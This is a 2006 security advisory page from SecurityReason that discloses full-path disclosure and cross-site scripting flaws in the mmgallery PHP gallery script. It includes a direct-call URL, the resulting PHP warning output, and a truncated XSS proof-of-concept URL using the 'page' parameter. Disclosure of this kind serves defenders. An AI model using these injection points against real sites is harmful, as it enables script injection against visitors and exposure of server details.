|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1917 CVE : CVE-2006-6119 CVE : CVE-2006-6118 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Al7ejaz HackerZ Published : 27.11.2006
Advisory Content : ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ..,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: + + tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: + + tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: + + ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: + + ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: + + ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: + + ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;:: + + ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. + + ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. + + ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. + + tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. + + jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. + + ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. + + ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. + + iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; + + ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, + + jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, + + jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: + + iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii + + ;;.. ii;; + + .. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++ + + Credit by : Al7ejaz HackerZ mmgallery Multiple vulnerabilities Script : mmgallery Website: mmgallery.net Impact : FullPath disclosure and Cross site Scripting FullPath disclosure in thumbs.php ********************************* when thumbs.php file is called directelly withowth argument this cause fullpath disclosure http://localhost/thumbs.php Result ------------------------------------------------------------------------ Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/photos/functions.inc on line 46 Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 58 Galery :: Title :: Warning: opendir(.//thumbs) [function.opendir]: failed to open dir: No such file or directory in /var/www/user/functions.inc on line 99 Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 101 Warning: sort() expects parameter 1 to be array, null given in /var/www/user/functions.inc on line 112 Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 113 -------------------------------------------- Cross Site Scripting ************************ page varibale is not proprely verified and can be used to execute arbitary htmlcode http://localhost/thumbs.php?page='> Al7ejaz HackerZ ;) /Milw0rm  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |